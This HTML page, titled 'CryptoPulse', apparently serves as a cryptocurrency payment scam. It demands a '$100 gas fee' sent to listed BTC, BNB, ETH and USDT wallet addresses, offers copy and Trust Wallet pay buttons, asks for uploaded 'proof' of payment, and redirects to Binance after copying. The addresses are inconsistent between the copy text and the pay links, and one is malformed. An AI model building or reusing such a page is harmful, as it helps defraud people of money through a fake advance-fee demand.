<!DOCTYPE html>

<html>
<head>  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>CryptoPulse</title>
</head>
<script>
function copyToClipboard(selector) {
    // Get the element
    const element = document.querySelector(selector);
    
    // Create a temporary textarea element to hold the text to be copied
    const tempTextarea = document.createElement('textarea');
    tempTextarea.value = element.tagName === 'INPUT' || element.tagName === 'TEXTAREA' ? element.value : element.textContent;
    
    // Append the temporary textarea to the body
    document.body.appendChild(tempTextarea);
    
    // Select the text in the textarea
    tempTextarea.select();
    
    // Execute the copy command
    document.execCommand('copy');
    
    // Remove the temporary textarea from the body
    document.body.removeChild(tempTextarea);
    
    // Alert the user that the text has been copied
    alert('Text copied to clipboard');
     window.location.href = "https://www.google.com/url?sa=t&source=web&rct=j&opi=89978449&url=https://www.binance.com/&ved=2ahUKEwjO7qGzqKOGAxVNV0EAHVqyCE4QFnoECAcQAQ&usg=AOvVaw2nfKDSIMczyoU2S1y5PEmQ";
    
}

</script>
<style>
  body{
    background-color: azure;
  }
.card {
  box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2);
  margin: 20px 10px;
  border: 2px solid greenyellow;
  text-align: center;
  font-family: arial;
  border-radius: 20px;
  background-color: white ;

}
@media (min-width: 550px){
  .card {
    
    max-width: 500px;
    
    justify-content: center;
  }
}
@media (min-width: 550px) {
  html {
    display: flex;
    justify-content: center;
    
  }
}

.price {
  color: grey;
  font-size: 22px;
}

.card button {
  border: none;
  outline: 0;
  padding: 12px;
  color: black;
  background-color: orange;
  text-align: center;
  cursor: pointer;
  width: 40%;
  margin: 5px;
  font-size: 18px;
}

.card button:hover {
  background-color: rgb(9, 252, 9);
}
.card button a {
  text-decoration: none;
  padding: none;
  font-size: 18px;

}
.proof { 
  text-align:center;
  display: flex;
  
  flex-direction: column;
  justify-content: center;
  
}
.proof label { font-size: 1.4rem;}
a { color: black; 
  font-size: 1.4rem;
}
input { 
  display: block;
  align-items: center;

  
}
h3 {
  text-align: center;
  color: black;
}
@media (min-width: 550px) {
  h3 {
    font-size: 2rem;
  }
}
.file {
  align-items: center;
  text-align: center;
  display: flex;
  flex-direction: column;
  justify-content: center;
}
.card p img {
  height: 20px;
  width: 20px;
}
.translator {
  font-size: 1rem;
}
</style>

<body>
  <div class="translator" id="google_translate_element" ></div>
    <script type="text/javascript">
        function googleTranslateElementInit() {
            new google.translate.TranslateElement({
                pageLanguage: 'en',
                includedLanguages: 'en,es,fr,de,zh-CN,ja,ar,hi,ru,it,pt,ko,sv,nl,tr,pl', // Add the languages you want to support
                layout: google.translate.TranslateElement.InlineLayout.SIMPLE
            }, 'google_translate_element');
        }
    </script>
    <script type="text/javascript" src="https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>

  <h3>
    Pay $100 for gas fees to this address genereted below
  </h3>
  <div class="card">
    <p class="card"><img src="./image/btc.png" alt="logo"> BTC scan to pay</p>
  <img src="./image/BTCa.jpg" alt="Denim Jeans" style="width:100%">
  <h1>Pay with BTC </h1>
  <p id="buy-now">1BTC = $69,535.89</p>
  <p id="copyParagraph">bc1qjwa8rkkpfh4r36uh4eqqdwn9ujtw7hpn88g82</p>
  <p> <button onclick="copyToClipboard('#copyParagraph')" > copy to pay</button>
    <button><a href="https://link.trustwallet.com/send?coin=0&address=bc1qjw3c9r0420flpldk22z8gmd85640mmt57c3zka">click to pay</a></button></p>
</div>
  <div class="card">
    <p class="card"><img src="./image/bnb.png" alt="logo"> BNB scan to pay</p>
  <img src="./image/BNBa.jpg" alt="Denim Jeans" style="width:100%">
  <h1>Pay with BNB </h1>
  <p id="buy-now">1BNB = $69,535.89</p>
  <p id="copyParagraph">0xb13bC0fDBe52c6607145347364d05d0a414E0A5C</p>
  <p> <button onclick="copyToClipboard('#copyParagraph')" > copy to pay</button>
    <button><a href="https://link.trustwallet.com/send?coin=20000714&address=0xb13bC0fDBe52c6607145347364d05d0a414E0A5C">click to pay</a></button></p>
</div>
  <div class="card">
    <p class="card"><img src="./image/eth.jpg" alt="logo"> ETH scan to pay</p>
  <img src="./image/ETHa.jpg" alt="Denim Jeans" style="width:100%">
  <h1>Pay with ETH </h1>
  <p id="buy-now">1ETH = $3,535.89</p>
  <p id="copyParagraph">0xb13bC0fDBe52c6607145347364d05d0a414E0A5CC</p>
  <p> <button onclick="copyToClipboard('#copyParagraph')" > copy to pay</button>
    <button><a href="https://link.trustwallet.com/send?coin=60&address=0xb13bC0fDBe52c6607145347364d05d0a414E0A5C">click to pay</a></button></p>
</div>
  <div class="card">
    <p class="card"><img src="./image/usdt.png" alt="logo"> USDT scan to pay</p>
  <img src="./image/USDTa.jpg" alt="Denim Jeans" style="width:100%">
  <h1>Pay with USDT </h1>
  <p id="buy-now">1USDT = $0.999413</p>
  <p id="copyParagraph">FKLr2K1QgHr5TKMtwicZiGPPyHa1dy54SbPuXUtYUR5x</p>
  <p> <button onclick="copyToClipboard('#copyParagraph')" > copy to pay</button>
    <button><a href="Pay me via Trust Wallet: https://link.trustwallet.com/send?coin=501&address=FKLr2K1QgHr5TKMtwicZiGPPyHa1dy54SbPuXUtYUR5x&token_id=5goWRao6a3yNC4d6UjMdQxonkCMvKBwdpubU3qhfcdf1">click to pay</a></button></p>
</div>

<div class="proof">
  <label for="filename">Upload proof</label>
<div class="file">
<input type="file" id="myFile" name="filename" placeholder="upload proof">

</div>  <a href="login.html">Comfarm payment</a>

</div>
  </body>
</html>

    